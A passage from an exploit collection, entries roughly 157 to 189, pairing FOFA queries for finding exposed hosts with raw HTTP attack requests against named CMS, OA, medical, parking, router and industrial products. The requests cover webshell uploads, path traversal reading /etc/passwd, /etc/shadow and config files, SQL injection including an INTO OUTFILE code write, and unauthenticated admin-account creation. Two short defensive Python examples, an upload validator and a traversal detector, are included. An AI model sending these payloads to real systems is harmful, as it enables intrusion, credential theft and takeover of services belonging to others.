Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

The file is stored under its original name and served at http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

The backslash-quote in contenthistid is the trigger; entry 187 below is the time-based (SLEEP) form of the same CVE.

159. INFINITT (英飞达) PACS WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>...</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

bufValue (the file body) is omitted above. The uploaded handler is then reached at:
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The slashes and dot-segments are percent-encoded (%2F), so a filter that only looks for a literal "../" in the raw request line does not see this one.

161. 科拓 smart parking fee system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field sets the file name (path traversal in it is not filtered) and <fileFlow> carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

Step 2: the ../ sequence places the file in the web root, so it is reached at http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

The remotePath field lets the client choose the destination directory; the file is then served at http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

The image upload action accepts a .php file declared as image/jpeg; the response JSON carries the stored path.

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

The server renames the upload to update.aspx but keeps the extension; it is served at http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
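
The upload POCs in entries 159 to 164 (and 155 and 157 before them) all work for the same reasons: the file name, the extension, the declared Content-Type and, in 161 and 162, the destination directory are taken from the client. As an added example that is not code from this page or from any of the vendors listed, here is the server-side check that stops each of them. The allowed-extension list, the magic-byte table and the upload root are assumptions for a deployment that only accepts images and PDFs; the file names in the comments are the ones from the POCs above.

```python
import os
import posixpath
import re
import secrets

# Added example (not code from the original page or any vendor it lists):
# the validation the upload POCs in entries 155-164 rely on being absent.
# ALLOWED_EXT, MAGIC and UPLOAD_ROOT are assumptions for an image/PDF-only
# upload endpoint; adjust them per deployment.

ALLOWED_EXT = {"png", "jpg", "jpeg", "gif", "pdf"}
# Never accepted, not even as an inner extension (shell.php.png, x.aspx;.jpg).
EXECUTABLE_EXT = {"php", "phtml", "php5", "jsp", "jspx", "asp", "aspx",
                  "asmx", "ashx", "cer", "cfm", "war"}
# Leading bytes that must match the claimed extension; the client's
# Content-Type header is never consulted.
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
    "pdf": b"%PDF-",
}
UPLOAD_ROOT = "/var/www/uploads"   # assumed; must not be a script-execution path


class UploadRejected(ValueError):
    """Raised instead of writing anything when a check fails."""


def safe_upload(filename: str, data: bytes, upload_root: str = UPLOAD_ROOT) -> str:
    """Validate an upload and return the server-chosen path it would be stored at."""
    # 1. Only the base name is ever used, so "../../../../dizxdell.aspx"
    #    (entry 161) collapses to "dizxdell.aspx" and the client cannot steer
    #    the directory. Backslashes count as separators for IIS hosts.
    base = posixpath.basename(filename.replace("\\", "/"))
    if not base or base in (".", ".."):
        raise UploadRejected("empty file name")

    # 2. Every dotted (or ';'-separated) component after the first is an
    #    extension candidate, so x.aspx.jpg and x.php;.png are refused too.
    parts = [p.lower() for p in re.split(r"[.;]", base) if p]
    if len(parts) < 2:
        raise UploadRejected("no extension: %s" % base)
    exts = parts[1:]
    if any(e in EXECUTABLE_EXT for e in exts):
        raise UploadRejected("executable extension: %s" % base)
    ext = exts[-1]
    if ext not in ALLOWED_EXT:
        raise UploadRejected("extension not allowed: %s" % ext)

    # 3. The bytes decide, not the header: "<?php ..." declared as image/png
    #    (entry 155) or a .php part declared image/jpeg (entry 163) fails here.
    if not data.startswith(MAGIC[ext]):
        raise UploadRejected("content does not match .%s" % ext)

    # 4. The stored name is random and server-chosen, and the directory is
    #    fixed (no client "remotePath" as in entry 162) and re-checked.
    stored = "%s.%s" % (secrets.token_hex(16), ext)
    dest = os.path.normpath(os.path.join(upload_root, stored))
    if os.path.dirname(dest) != os.path.normpath(upload_root):
        raise UploadRejected("path escaped upload root")
    return dest


def is_accepted(filename: str, data: bytes) -> bool:
    """True if safe_upload would store the file, False if it rejects it."""
    try:
        safe_upload(filename, data)
        return True
    except UploadRejected:
        return False
```

Run against the POC file names, dizxdell.aspx, test.php, kjuhitjgk.aspx, 1.php and qaz.aspx are all refused at step 2, a PHP body sent as image/png is refused at step 3, and the only thing that passes is a real PNG under a name the server generated. Storing under a random name outside the script-execution path, rather than under the client's name as entries 157 and 162 do, is what keeps a bypass of the extension check from turning into code execution.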

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL: https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

The injection point is the sortOrder parameter (an ORDER BY clause, so a boolean probe is used rather than a quoted string).

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

The CHAR(104)+CHAR(101)+CHAR(108)+CHAR(108)+CHAR(111) term builds the string 'hello' with MSSQL string concatenation; it appears in the error message when the injection succeeds.

167. 精益价值管理系统 (Lean Value Management System) DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景 (HJSOFT) EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

The path parameter is encoded by the application's own scheme, so the target file is not visible in the request line.

169. 宏景 (HJSOFT) EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

The /templates/attestation/../../ prefix is what reaches the servlet without authentication; WAITFOR DELAY is an MSSQL time-based probe.

170. 宏景 (HJSOFT) EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星 CMSV6 vehicle GPS monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

The ;downloadLogger.action path-parameter suffix is what gets the request past the access filter; SLEEP(5) is a MySQL time-based probe.

172. DT HD license plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

A browser normalises the leading ../ away before sending; the request has to be issued with a raw HTTP client (curl --path-as-is, or a proxy).

173. Check Point Security Gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

The traversal is carried in the POST body rather than the URL, so URL-only path filters do not see it.

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

Each of these normalises to /<model>.cfg, the device configuration file; the request only starts with /userLogin.asp so that it passes the check applied to the login page. One path per router model, so try the one matching the target.

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

The %2e%2e segment collapses the path to /imc/flexFileUpload, which is the unauthenticated route the access rule on /imc/primepush/ does not cover. Verify the upload with:
GET /imc/primepush/%2e%2e/flex/12234.txt
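
A grep for "../" in the access log misses most of the traversal requests in entries 160 to 178: 160 percent-encodes the slashes, 178 percent-encodes the dots, 173 carries the path in the POST body, 167 and 174 carry it in a query value, and 177 and 178 never leave the web root at all but resolve to a path that no longer starts with the segment the access rule keyed on. As an added example that is not code from this page or from any vendor it lists, here is a detector that decodes first, resolves the dot-segments by hand and reports those two distinct signals separately. The request strings in the test are copied from the POCs above; nothing is sent anywhere.

```python
from urllib.parse import unquote

# Added example (not code from the original page or any vendor it lists).
# Resolves traversal the way a server would, reporting both a climb above
# the root (entries 160, 172, 173) and a rewrite that stays inside the root
# but defeats a prefix-based access rule (entries 177, 178).


def decode_fully(s: str, rounds: int = 3) -> str:
    """Undo up to `rounds` layers of percent-encoding (%252e -> %2e -> .)."""
    for _ in range(rounds):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s


def normalize_path(path: str):
    """Decode, then resolve "." and ".." by hand.

    Returns (normalized, escaped, rewritten):
      escaped   - the walk climbed above the root at some point. This is the
                  signal posixpath.normpath would silently clamp away, so the
                  walk is done manually.
      rewritten - at least one dot-segment was resolved. The result may still
                  be inside the root, but it no longer starts with the segment
                  an access rule such as "everything under /userLogin.asp is
                  public" or "only /imc/primepush/ needs no login" keyed on.
    """
    p = decode_fully(path).replace("\\", "/")
    stack, escaped, rewritten = [], False, False
    for part in p.split("/"):
        if part == "":
            continue
        if part == ".":
            rewritten = True
        elif part == "..":
            rewritten = True
            if stack:
                stack.pop()
            else:
                escaped = True
        else:
            stack.append(part)
    return "/" + "/".join(stack), escaped, rewritten


def inspect_request(target: str, body: str = "") -> dict:
    """Check the URL path, every query value and every body value.

    A body with no "name=" at all (entry 173 posts a bare path) is treated as
    a single value and reported under the name "<body>".
    """
    url_path, _, query = target.partition("?")
    norm, escaped, rewritten = normalize_path(url_path)
    params = []
    for blob in (query, body):
        for pair in blob.split("&"):
            name, sep, value = pair.partition("=")
            candidate = value if sep else name
            if not candidate:
                continue
            _, esc, rew = normalize_path(candidate)
            if esc or rew:
                params.append(decode_fully(name) if sep else "<body>")
    return {"path": norm, "escaped": escaped, "rewritten": rewritten,
            "params": params}
```

Two of the file-read entries are out of scope for this check on purpose: entry 168 encodes the path in an application-specific scheme, and entries 188 and 190 pass an absolute path or a file:// URL with no dot-segments at all. Those need an allow-list on the parameter, not traversal detection.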

179. 建文 engineering project management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

MySQL error-based injection in the xu parameter: updatexml() raises an XPath error whose text contains the result of select user().

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

The handler creates the account without any session; when checking a host, look for unexpected accounts created through this endpoint rather than only for the POC username.

183. 广州图创 Interlib library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

Oracle error-based injection in the token parameter: ctxsys.drithsx.sn raises an error containing the result of the subquery (here 111111*111111). Note that the endpoint is a password-change call, so the same request also attempts to set loginid admin11 to Aa@123456.

184. 迅饶科技 (SunFull) X2Modbus gateway AddUser arbitrary user creation
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

The request body is a raw SQL INSERT that the endpoint executes as-is, so the client chooses every column of the new account, including PURVIEW.

185. 瑞友天翼 (REALOR) application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

This is a MySQL stacked query (the %3B is a ';' closing the original statement). The unhex() argument decodes to <?php echo md5("1"); $file = __FILE__; unlink($file); and INTO OUTFILE writes it to .\\..\\..\\WebRoot\\plom.xgi, so a GET /plom.xgi that returns c4ca4238a0b923820dcc509a6f75849b (md5 of "1") confirms code execution. INTO OUTFILE needs the FILE privilege and a secure_file_priv setting that does not exclude the web root, which is why the POC targets the application's own database account.

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power plants.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

The RANDOMBLOB heavy query is the SQLite equivalent of a sleep: the backend has no delay function, so a large random blob is generated to make the response measurably slower.

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

Same CVE as entry 158, here with the MySQL SLEEP(5) time-based form.

188. 叁体 佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

The file parameter takes an absolute path, so there is no ../ to filter; the parameter needs an allow-list.

189. 蓝网科技 (LANWON) clinical viewer deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
